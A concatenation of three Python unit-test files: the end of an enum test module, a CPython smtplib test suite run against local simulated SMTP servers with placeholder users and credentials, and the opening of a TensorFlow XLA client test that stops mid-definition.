print('\n%s\n%s\n%s\n%s\n' % ('=' * 75, r, v, '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
def test_test_simple_enum(self):
@_simple_enum(Enum)
class SimpleColor:
RED = 1
GREEN = 2
BLUE = 3
class CheckedColor(Enum):
RED = 1
GREEN = 2
BLUE = 3
self.assertTrue(_test_simple_enum(CheckedColor, SimpleColor) is None)
SimpleColor.GREEN._value_ = 9
self.assertRaisesRegex(
TypeError, "enum mismatch",
_test_simple_enum, CheckedColor, SimpleColor,
)
class CheckedMissing(IntFlag, boundary=KEEP):
SIXTY_FOUR = 64
ONE_TWENTY_EIGHT = 128
TWENTY_FORTY_EIGHT = 2048
ALL = 2048 + 128 + 64 + 12
CM = CheckedMissing
self.assertEqual(list(CheckedMissing), [CM.SIXTY_FOUR, CM.ONE_TWENTY_EIGHT, CM.TWENTY_FORTY_EIGHT])
#
@_simple_enum(IntFlag, boundary=KEEP)
class Missing:
SIXTY_FOUR = 64
ONE_TWENTY_EIGHT = 128
TWENTY_FORTY_EIGHT = 2048
ALL = 2048 + 128 + 64 + 12
M = Missing
self.assertEqual(list(CheckedMissing), [M.SIXTY_FOUR, M.ONE_TWENTY_EIGHT, M.TWENTY_FORTY_EIGHT])
#
_test_simple_enum(CheckedMissing, Missing)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
support.check__all__(self, enum, not_exported={'bin', 'show_flag_values'})
# These are unordered here on purpose to ensure that declaration order
# makes no difference.
CONVERT_TEST_NAME_D = 5
CONVERT_TEST_NAME_C = 5
CONVERT_TEST_NAME_B = 5
CONVERT_TEST_NAME_A = 5 # This one should sort first.
CONVERT_TEST_NAME_E = 5
CONVERT_TEST_NAME_F = 5
CONVERT_STRING_TEST_NAME_D = 5
CONVERT_STRING_TEST_NAME_C = 5
CONVERT_STRING_TEST_NAME_B = 5
CONVERT_STRING_TEST_NAME_A = 5 # This one should sort first.
CONVERT_STRING_TEST_NAME_E = 5
CONVERT_STRING_TEST_NAME_F = 5
class TestIntEnumConvert(unittest.TestCase):
def setUp(self):
# Reset the module-level test variables to their original integer
# values, otherwise the already created enum values get converted
# instead.
for suffix in ['A', 'B', 'C', 'D', 'E', 'F']:
globals()[f'CONVERT_TEST_NAME_{suffix}'] = 5
globals()[f'CONVERT_STRING_TEST_NAME_{suffix}'] = 5
def test_convert_value_lookup_priority(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# We don't want the reverse lookup value to vary when there are
# multiple possible names for a given value. It should always
# report the first lexigraphical name in that case.
self.assertEqual(test_type(5).name, 'CONVERT_TEST_NAME_A')
def test_convert(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# Ensure that test_type has all of the desired names and values.
self.assertEqual(test_type.CONVERT_TEST_NAME_F,
test_type.CONVERT_TEST_NAME_A)
self.assertEqual(test_type.CONVERT_TEST_NAME_B, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_C, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_D, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_E, 5)
# Ensure that test_type only picked up names matching the filter.
self.assertEqual([name for name in dir(test_type)
if name[0:2] not in ('CO', '__')],
[], msg='Names other than CONVERT_TEST_* found.')
@unittest.skipUnless(python_version == (3, 8),
'_convert was deprecated in 3.8')
def test_convert_warn(self):
with self.assertWarns(DeprecationWarning):
enum.IntEnum._convert(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
@unittest.skipUnless(python_version >= (3, 9),
'_convert was removed in 3.9')
def test_convert_raise(self):
with self.assertRaises(AttributeError):
enum.IntEnum._convert(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
@unittest.skipUnless(
python_version < (3, 12),
'mixin-format now uses member instead of member.value',
)
def test_convert_repr_and_str(self):
module = ('test.test_enum', '__main__')[__name__=='__main__']
test_type = enum.IntEnum._convert_(
'UnittestConvert',
module,
filter=lambda x: x.startswith('CONVERT_STRING_TEST_'))
self.assertEqual(repr(test_type.CONVERT_STRING_TEST_NAME_A), '%s.CONVERT_STRING_TEST_NAME_A' % module)
self.assertEqual(str(test_type.CONVERT_STRING_TEST_NAME_A), 'CONVERT_STRING_TEST_NAME_A')
with self.assertWarns(DeprecationWarning):
self.assertEqual(format(test_type.CONVERT_STRING_TEST_NAME_A), '5')
# global names for StrEnum._convert_ test
CONVERT_STR_TEST_2 = 'goodbye'
CONVERT_STR_TEST_1 = 'hello'
class TestStrEnumConvert(unittest.TestCase):
def setUp(self):
global CONVERT_STR_TEST_1
global CONVERT_STR_TEST_2
CONVERT_STR_TEST_2 = 'goodbye'
CONVERT_STR_TEST_1 = 'hello'
def test_convert(self):
test_type = enum.StrEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_STR_'))
# Ensure that test_type has all of the desired names and values.
self.assertEqual(test_type.CONVERT_STR_TEST_1, 'hello')
self.assertEqual(test_type.CONVERT_STR_TEST_2, 'goodbye')
# Ensure that test_type only picked up names matching the filter.
self.assertEqual([name for name in dir(test_type)
if name[0:2] not in ('CO', '__')],
[], msg='Names other than CONVERT_STR_* found.')
def test_convert_repr_and_str(self):
module = ('test.test_enum', '__main__')[__name__=='__main__']
test_type = enum.StrEnum._convert_(
'UnittestConvert',
module,
filter=lambda x: x.startswith('CONVERT_STR_'))
self.assertEqual(repr(test_type.CONVERT_STR_TEST_1), '%s.CONVERT_STR_TEST_1' % module)
self.assertEqual(str(test_type.CONVERT_STR_TEST_2), 'goodbye')
self.assertEqual(format(test_type.CONVERT_STR_TEST_1), 'hello')
if __name__ == '__main__':
unittest.main()
|
test_smtplib.py
|
import asyncore
import email.utils
import socket
import smtpd
import smtplib
import StringIO
import sys
import time
import select
import unittest
from test import test_support
try:
import threading
except ImportError:
threading = None
HOST = test_support.HOST
def server(evt, buf, serv):
serv.listen(5)
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 500
while buf and n > 0:
r, w, e = select.select([], [conn], [])
if w:
sent = conn.send(buf)
buf = buf[sent:]
n -= 1
conn.close()
finally:
serv.close()
evt.set()
@unittest.skipUnless(threading, 'Threading required for this test.')
class GeneralTests(unittest.TestCase):
def setUp(self):
self._threads = test_support.threading_setup()
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.port = test_support.bind_port(self.sock)
servargs = (self.evt, "220 Hola mundo\n", self.sock)
self.thread = threading.Thread(target=server, args=servargs)
self.thread.start()
self.evt.wait()
self.evt.clear()
def tearDown(self):
self.evt.wait()
self.thread.join()
test_support.threading_cleanup(*self._threads)
def testBasic1(self):
# connects
smtp = smtplib.SMTP(HOST, self.port)
smtp.close()
def testBasic2(self):
# connects, include port in host name
smtp = smtplib.SMTP("%s:%s" % (HOST, self.port))
smtp.close()
def testLocalHostName(self):
# check that supplied local_hostname is used
smtp = smtplib.SMTP(HOST, self.port, local_hostname="testhost")
self.assertEqual(smtp.local_hostname, "testhost")
smtp.close()
def testTimeoutDefault(self):
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
smtp = smtplib.SMTP(HOST, self.port)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
def testTimeoutNone(self):
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
smtp = smtplib.SMTP(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(smtp.sock.gettimeout())
smtp.close()
def testTimeoutValue(self):
smtp = smtplib.SMTP(HOST, self.port, timeout=30)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
# Test server thread using the specified SMTP server class
def debugging_server(serv, serv_evt, client_evt):
serv_evt.set()
try:
if hasattr(select, 'poll'):
poll_fun = asyncore.poll2
else:
poll_fun = asyncore.poll
n = 1000
while asyncore.socket_map and n > 0:
poll_fun(0.01, asyncore.socket_map)
# when the client conversation is finished, it will
# set client_evt, and it's then ok to kill the server
if client_evt.is_set():
serv.close()
break
n -= 1
except socket.timeout:
pass
finally:
if not client_evt.is_set():
# allow some time for the client to read the result
time.sleep(0.5)
serv.close()
asyncore.close_all()
serv_evt.set()
MSG_BEGIN = '---------- MESSAGE FOLLOWS ----------\n'
MSG_END = '------------ END MESSAGE ------------\n'
# NOTE: Some SMTP objects in the tests below are created with a non-default
# local_hostname argument to the constructor, since (on some systems) the FQDN
# lookup caused by the default local_hostname sometimes takes so long that the
# test server times out, causing the test to fail.
# Test behavior of smtpd.DebuggingServer
@unittest.skipUnless(threading, 'Threading required for this test.')
class DebuggingServerTests(unittest.TestCase):
def setUp(self):
# temporarily replace sys.stdout to capture DebuggingServer output
self.old_stdout = sys.stdout
self.output = StringIO.StringIO()
sys.stdout = self.output
self._threads = test_support.threading_setup()
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = smtpd.DebuggingServer((HOST, 0), ('nowhere', -1))
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
self.thread.join()
test_support.threading_cleanup(*self._threads)
# restore sys.stdout
sys.stdout = self.old_stdout
def testBasic(self):
# connect
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.quit()
def testNOOP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (250, 'Ok')
self.assertEqual(smtp.noop(), expected)
smtp.quit()
def testRSET(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (250, 'Ok')
self.assertEqual(smtp.rset(), expected)
smtp.quit()
def testNotImplemented(self):
# EHLO isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (502, 'Error: command "EHLO" not implemented')
self.assertEqual(smtp.ehlo(), expected)
smtp.quit()
def testVRFY(self):
# VRFY isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (502, 'Error: command "VRFY" not implemented')
self.assertEqual(smtp.vrfy('nobody@nowhere.com'), expected)
self.assertEqual(smtp.verify('nobody@nowhere.com'), expected)
smtp.quit()
def testSecondHELO(self):
# check that a second HELO returns a message that it's a duplicate
# (this behavior is specific to smtpd.SMTPChannel)
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.helo()
expected = (503, 'Duplicate HELO/EHLO')
self.assertEqual(smtp.helo(), expected)
smtp.quit()
def testHELP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.assertEqual(smtp.help(), 'Error: command "HELP" not implemented')
smtp.quit()
def testSend(self):
# connect and send mail
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('John', 'Sally', m)
# XXX(nnorwitz): this test is flaky and dies with a bad file descriptor
# in asyncore. This sleep might help, but should really be fixed
# properly by using an Event variable.
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
class NonConnectingTests(unittest.TestCase):
def testNotConnected(self):
# Test various operations on an unconnected SMTP object that
# should raise exceptions (at present the attempt in SMTP.send
# to reference the nonexistent 'sock' attribute of the SMTP object
# causes an AttributeError)
smtp = smtplib.SMTP()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.ehlo)
self.assertRaises(smtplib.SMTPServerDisconnected,
smtp.send, 'test msg')
def testNonnumericPort(self):
# check that non-numeric port raises socket.error
self.assertRaises(socket.error, smtplib.SMTP,
"localhost", "bogus")
self.assertRaises(socket.error, smtplib.SMTP,
"localhost:bogus")
# test response of client to a non-successful HELO message
@unittest.skipUnless(threading, 'Threading required for this test.')
class BadHELOServerTests(unittest.TestCase):
def setUp(self):
self.old_stdout = sys.stdout
self.output = StringIO.StringIO()
sys.stdout = self.output
self._threads = test_support.threading_setup()
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.port = test_support.bind_port(self.sock)
servargs = (self.evt, "199 no hello for you!\n", self.sock)
self.thread = threading.Thread(target=server, args=servargs)
self.thread.start()
self.evt.wait()
self.evt.clear()
def tearDown(self):
self.evt.wait()
self.thread.join()
test_support.threading_cleanup(*self._threads)
sys.stdout = self.old_stdout
def testFailingHELO(self):
self.assertRaises(smtplib.SMTPConnectError, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
@unittest.skipUnless(threading, 'Threading required for this test.')
class TooLongLineTests(unittest.TestCase):
respdata = '250 OK' + ('.' * smtplib._MAXLINE * 2) + '\n'
def setUp(self):
self.old_stdout = sys.stdout
self.output = StringIO.StringIO()
sys.stdout = self.output
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.port = test_support.bind_port(self.sock)
servargs = (self.evt, self.respdata, self.sock)
threading.Thread(target=server, args=servargs).start()
self.evt.wait()
self.evt.clear()
def tearDown(self):
self.evt.wait()
sys.stdout = self.old_stdout
def testLineTooLong(self):
self.assertRaises(smtplib.SMTPResponseException, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
sim_users = {'Mr.A@somewhere.com':'John A',
'Ms.B@somewhere.com':'Sally B',
'Mrs.C@somewhereesle.com':'Ruth C',
}
sim_auth = ('Mr.A@somewhere.com', 'somepassword')
sim_cram_md5_challenge = ('PENCeUxFREJoU0NnbmhNWitOMjNGNn'
'dAZWx3b29kLmlubm9zb2Z0LmNvbT4=')
sim_auth_credentials = {
'login': 'TXIuQUBzb21ld2hlcmUuY29t',
'plain': 'AE1yLkFAc29tZXdoZXJlLmNvbQBzb21lcGFzc3dvcmQ=',
'cram-md5': ('TXIUQUBZB21LD2HLCMUUY29TIDG4OWQ0MJ'
'KWZGQ4ODNMNDA4NTGXMDRLZWMYZJDMODG1'),
}
sim_auth_login_password = 'C29TZXBHC3N3B3JK'
sim_lists = {'list-1':['Mr.A@somewhere.com','Mrs.C@somewhereesle.com'],
'list-2':['Ms.B@somewhere.com',],
}
# Simulated SMTP channel & server
class SimSMTPChannel(smtpd.SMTPChannel):
def __init__(self, extra_features, *args, **kw):
self._extrafeatures = ''.join(
[ "250-{0}\r\n".format(x) for x in extra_features ])
smtpd.SMTPChannel.__init__(self, *args, **kw)
def smtp_EHLO(self, arg):
resp = ('250-testhost\r\n'
'250-EXPN\r\n'
'250-SIZE 20000000\r\n'
'250-STARTTLS\r\n'
'250-DELIVERBY\r\n')
resp = resp + self._extrafeatures + '250 HELP'
self.push(resp)
def smtp_VRFY(self, arg):
# For max compatibility smtplib should be sending the raw address.
if arg in sim_users:
self.push('250 %s %s' % (sim_users[arg], smtplib.quoteaddr(arg)))
else:
self.push('550 No such user: %s' % arg)
def smtp_EXPN(self, arg):
list_name = arg.lower()
if list_name in sim_lists:
user_list = sim_lists[list_name]
for n, user_email in enumerate(user_list):
quoted_addr = smtplib.quoteaddr(user_email)
if n < len(user_list) - 1:
self.push('250-%s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('250 %s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('550 No access for you!')
def smtp_AUTH(self, arg):
if arg.strip().lower()=='cram-md5':
self.push('334 {0}'.format(sim_cram_md5_challenge))
return
mech, auth = arg.split()
mech = mech.lower()
if mech not in sim_auth_credentials:
self.push('504 auth type unimplemented')
return
if mech == 'plain' and auth==sim_auth_credentials['plain']:
self.push('235 plain auth ok')
elif mech=='login' and auth==sim_auth_credentials['login']:
self.push('334 Password:')
else:
self.push('550 No access for you!')
def handle_error(self):
raise
class SimSMTPServer(smtpd.SMTPServer):
def __init__(self, *args, **kw):
self._extra_features = []
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accept(self):
conn, addr = self.accept()
self._SMTPchannel = SimSMTPChannel(self._extra_features,
self, conn, addr)
def process_message(self, peer, mailfrom, rcpttos, data):
pass
def add_feature(self, feature):
self._extra_features.append(feature)
def handle_error(self):
raise
# Test various SMTP & ESMTP commands/behaviors that require a simulated server
# (i.e., something with more features than DebuggingServer)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPSimTests(unittest.TestCase):
def setUp(self):
self._threads = test_support.threading_setup()
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPServer((HOST, 0), ('nowhere', -1))
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
self.thread.join()
test_support.threading_cleanup(*self._threads)
def testBasic(self):
# smoke test
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.quit()
def testEHLO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
# no features should be present before the EHLO
self.assertEqual(smtp.esmtp_features, {})
# features expected from the test server
expected_features = {'expn':'',
'size': '20000000',
'starttls': '',
'deliverby': '',
'help': '',
}
smtp.ehlo()
self.assertEqual(smtp.esmtp_features, expected_features)
for k in expected_features:
self.assertTrue(smtp.has_extn(k))
self.assertFalse(smtp.has_extn('unsupported-feature'))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for email, name in sim_users.items():
expected_known = (250, '%s %s' % (name, smtplib.quoteaddr(email)))
self.assertEqual(smtp.vrfy(email), expected_known)
u = 'nobody@nowhere.com'
expected_unknown = (550, 'No such user: %s' % u)
self.assertEqual(smtp.vrfy(u), expected_unknown)
smtp.quit()
def testEXPN(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for listname, members in sim_lists.items():
users = []
for m in members:
users.append('%s %s' % (sim_users[m], smtplib.quoteaddr(m)))
expected_known = (250, '\n'.join(users))
self.assertEqual(smtp.expn(listname), expected_known)
u = 'PSU-Members-List'
expected_unknown = (550, 'No access for you!')
self.assertEqual(smtp.expn(u), expected_unknown)
smtp.quit()
def testAUTH_PLAIN(self):
self.serv.add_feature("AUTH PLAIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
expected_auth_ok = (235, b'plain auth ok')
self.assertEqual(smtp.login(sim_auth[0], sim_auth[1]), expected_auth_ok)
# SimSMTPChannel doesn't fully support LOGIN or CRAM-MD5 auth because they
# require a synchronous read to obtain the credentials...so instead smtpd
# sees the credential sent by smtplib's login method as an unknown command,
# which results in smtplib raising an auth error. Fortunately the error
# message contains the encoded credential, so we can partially check that it
# was generated correctly (partially, because the 'word' is uppercased in
# the error message).
def testAUTH_LOGIN(self):
self.serv.add_feature("AUTH LOGIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
try: smtp.login(sim_auth[0], sim_auth[1])
except smtplib.SMTPAuthenticationError as err:
if sim_auth_login_password not in str(err):
raise "expected encoded password not found in error message"
def testAUTH_CRAM_MD5(self):
self.serv.add_feature("AUTH CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
try: smtp.login(sim_auth[0], sim_auth[1])
except smtplib.SMTPAuthenticationError as err:
if sim_auth_credentials['cram-md5'] not in str(err):
raise "expected encoded credentials not found in error message"
#TODO: add tests for correct AUTH method fallback now that the
#test infrastructure can support it.
def test_quit_resets_greeting(self):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=15)
code, message = smtp.ehlo()
self.assertEqual(code, 250)
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
self.assertNotIn('size', smtp.esmtp_features)
smtp.connect(HOST, self.port)
self.assertNotIn('size', smtp.esmtp_features)
smtp.ehlo_or_helo_if_needed()
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
def test_main(verbose=None):
test_support.run_unittest(GeneralTests, DebuggingServerTests,
NonConnectingTests,
BadHELOServerTests, SMTPSimTests,
TooLongLineTests)
if __name__ == '__main__':
test_main()
|
xla_client_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Backend-dependent tests for the Python XLA client."""
import functools
import itertools
import re
import threading
import unittest
from absl import flags
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
from tensorflow.compiler.xla.python import xla_client
# pylint: disable=g-import-not-at-top
try:
from tensorflow.compiler.xla.python import custom_call_for_test
except ImportError:
custom_call_for_test = None
bfloat16 = xla_client.bfloat16
ops = xla_client.ops
FLAGS = flags.FLAGS
# We choose to ignore pylint's complaints about complex comprehensions, which we
# use widely for parameterizing tests.
# pylint: disable=g-complex-comprehension
def TestFactory(xla_backend, cloud_tpu=False):
tests = []
if not cloud_tpu:
int_dtypes = [np.int32, np.int64, np.uint32, np.uint64]
# TODO(phawkins): test np.float16, where supported.
float_dtypes = [bfloat16, np.float32, np.float64]
complex_dtypes = [np.complex64, np.complex128]
standard_dtypes = int_dtypes + float_dtypes + complex_dtypes + [np.bool_]
else:
int_dtypes = [np.int32, np.uint32]
float_dtypes = [np.float32]
complex_dtypes = [np.complex64]
standard_dtypes = int_dtypes + float_dtypes + complex_dtypes + [np.bool_]
dlpack_dtypes = int_dtypes + float_dtypes
class ComputationTest(parameterized.TestCase):
"""Base class for running an XLA Computation through the local client."""
def setUp(self):
super(ComputationTest, self).setUp()
self.backend = xla_backend()
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.XlaBuilder(name)
def _Execute(self, c, arguments):
compiled_c = self.backend.compile(c.build())
return xla_client.execute_with_python_values(
compiled_c, arguments, backend=self.backend)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
results = self._Execute(c, arguments)
self.assertLen(results, len(expected))
for result, e in zip(results, expected):
# Numpy's comparison methods are a bit too lenient by treating inputs as
# "array-like", meaning that scalar 4 will be happily compared equal to
# [[4]]. We'd like to be more strict so assert shapes as well.
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(e).shape)
assert_func(result, e)
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments,
expected)
def _ExecuteAndCompareClose(self,
c,
arguments=(),
expected=None,
rtol=1e-4,
atol=0):
self._ExecuteAndAssertWith(
functools.partial(np.testing.assert_allclose, rtol=rtol, atol=atol),
c, arguments, expected)
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayBool(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.bool dtype."""
return np.array(*args, dtype=np.bool, **kwargs)
class ComputationPrinting(absltest.TestCase):
def setUp(self):
super(ComputationPrinting, self).setUp()
self.backend = xla_backend()
def ExampleComputation(self):
builder = xla_client.XlaBuilder("acomputation")
p0 = ops.Parameter(builder, 0, xla_client.shape_from_pyval(np.float32(0)))
p1 = ops.Parameter(
builder, 1, xla_client.shape_from_pyval(np.zeros((4,), np.float32)))
x = ops.Mul(p0, p1)
ops.Add(x, x)
return builder.build()
@unittest.skipIf(cloud_tpu, "not implemented")
def testCompiledHloModuleToHloText(self):
computation = self.ExampleComputation()
executable = self.backend.compile(computation)
hlo_modules = executable.hlo_modules()
self.assertLen(hlo_modules, 1)
hlo_text = hlo_modules[0].to_string()
self.assertTrue(hlo_text.startswith("HloModule acomputation"))
self.assertIn("fusion", hlo_text)
@unittest.skipIf(cloud_tpu, "not implemented")
def testFlopEstimate(self):
computation = self.ExampleComputation()
properties = xla_client._xla.hlo_module_cost_analysis(
self.backend, computation.as_hlo_module())
self.assertEqual(properties["flops"], 8.0)
tests.append(ComputationPrinting)
class ComputationsWithConstantsTest(ComputationTest):
"""Tests focusing on Constant ops."""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes + float_dtypes)
def testConstantScalarSum(self, dtype):
if dtype == np.int8 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support int8")
c = self._NewComputation()
ops.Add(ops.Constant(c, dtype(1.11)), ops.Constant(c, dtype(3.14)))
self._ExecuteAndCompareClose(c, expected=[dtype(1.11) + dtype(3.14)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorMul(self, dtype):
c = self._NewComputation()
ops.Mul(
ops.Constant(c, np.array([2.5, 3.3, -1.2, 0.7], dtype)),
ops.Constant(c, np.array([-1.2, 2, -2, -3], dtype)))
self._ExecuteAndCompareClose(
c, expected=[[-3, 6.6, 2.4, -2.1]], rtol=3e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorScalarDiv(self, dtype):
c = self._NewComputation()
ops.Div(
ops.Constant(c, np.array([1.5, 2.5, 3.0, -10.8], dtype=dtype)),
ops.Constant(c, dtype(2.0)))
self._ExecuteAndCompareClose(
c, expected=[[0.75, 1.25, 1.5, -5.4]], rtol=2e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorScalarPow(self, dtype):
c = self._NewComputation()
ops.Pow(
ops.Constant(c, np.array([1.5, 2.5, 3.0], dtype=dtype)),
ops.Constant(c, dtype(2.)))
self._ExecuteAndCompareClose(c, expected=[[2.25, 6.25, 9.]])
def testIota(self):
c = self._NewComputation()
ops.Iota(c, xla_client.PrimitiveType.F32, 10)
self._ExecuteAndCompareExact(
c, expected=[np.arange(10, dtype=np.float32)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes)
def testBroadcastedIota(self, dtype):
c = self._NewComputation()
shape = xla_client.Shape.array_shape(
xla_client.dtype_to_etype(dtype), (2, 3))
ops.Iota(c, shape, 1)
expected = np.array([[0, 1, 2], [0, 1, 2]], dtype=dtype)
self._ExecuteAndCompareExact(c, expected=[expected])
def testBooleanAnd(self):
c = self._NewComputation()
ops.And(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[True, False, False, False]])
def testBooleanOr(self):
c = self._NewComputation()
ops.Or(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[True, True, True, False]])
def testBooleanXor(self):
c = self._NewComputation()
ops.Xor(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[False, True, True, False]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2D(self, dtype):
c = self._NewComputation()
ops.Add(
ops.Constant(c, np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype)),
ops.Constant(c, np.array([[1, -1, 1], [-1, 1, -1]], dtype=dtype)))
self._ExecuteAndCompareClose(c, expected=[[[2, 1, 4], [3, 6, 5]]])
def testShiftLeft(self):
c = self._NewComputation()
ops.ShiftLeft(
ops.Constant(c, NumpyArrayS32([3])),
ops.Constant(c, NumpyArrayS32([2])))
self._ExecuteAndCompareClose(c, expected=[[12]])
def testShiftRightArithmetic(self):
c = self._NewComputation()
ops.ShiftRightArithmetic(
ops.Constant(c, NumpyArrayS32([-2])),
ops.Constant(c, NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[[-1]])
def testShiftRightLogical(self):
c = self._NewComputation()
ops.ShiftRightLogical(
ops.Constant(c, NumpyArrayS32([-1])),
ops.Constant(c, NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[[2**31 - 1]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
